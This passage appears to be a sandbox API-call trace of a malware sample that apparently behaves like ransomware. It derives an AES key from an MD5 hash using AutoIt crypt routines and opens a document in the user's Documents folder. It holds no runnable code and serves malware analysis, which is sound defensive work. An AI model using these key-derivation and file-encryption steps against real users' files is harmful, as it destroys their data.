lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.818] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.818] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.818] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.818] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.818] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.831] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.831] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.831] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0179.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x8ad0cf40, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 0x90ae18 [0179.831] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.832] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.832] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.832] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.832] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.832] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.832] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.832] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.833] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.833] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0179.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.833] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.834] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.834] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.834] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.834] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.835] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.835] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.835] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.835] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.835] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.835] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.835] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.836] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.836] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.836] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.836] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.836] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.836] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.836] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.837] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.837] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.837] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.837] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.837] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0179.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.837] CryptDestroyHash (hHash=0x90af58) returned 1 [0179.837] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ynsvrvaq.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.839] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.839] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 